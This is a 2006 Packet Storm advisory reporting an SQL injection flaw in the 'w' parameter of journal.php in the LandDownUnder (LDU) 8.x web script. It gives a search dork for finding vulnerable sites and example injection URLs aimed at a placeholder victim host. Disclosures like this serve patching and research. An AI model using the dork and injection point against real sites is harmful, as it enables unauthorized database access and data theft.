ldu-sql.txt

2006-12-30T00:00:00
ID PACKETSTORM:53330
Type packetstorm
Reporter Starext
Modified 2006-12-30T00:00:00

Description

                                        
                                            `# BhhGroup.Org & Trtekforum.com  
  
#Found By : St@rExT  
  
# script name : LandDownUnder [LDU]  
  
#Version : All  
  
#Dork : "Powered by LDU"  
  
# Script sites : http://www.neocrome.net  
  
#Vull name : LDU <= 8.x (journal.php) SQL Injection Vulnerability  
  
# Vulnerable file : Journal.inc.php  
  
http://victim.com/[scriptpath]/journal.php?m='&s=username&w=SELECT * FROM $db_journals WHERE jrn_userid='$jrn_userid' AND jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w  
  
#[SQL Vuln.] :  
  
http://victim.com/[scriptpath]/journal.php?m='&s=username&w=[SQL Inject]  
  
#Contact: StareXt@msn.com  
  
######## - Tüm Müslüman insanların Bayramını Kutlarım.. : ) - #####  
  
################### - Ne Mutlu Türküm Diyene - ###################  
`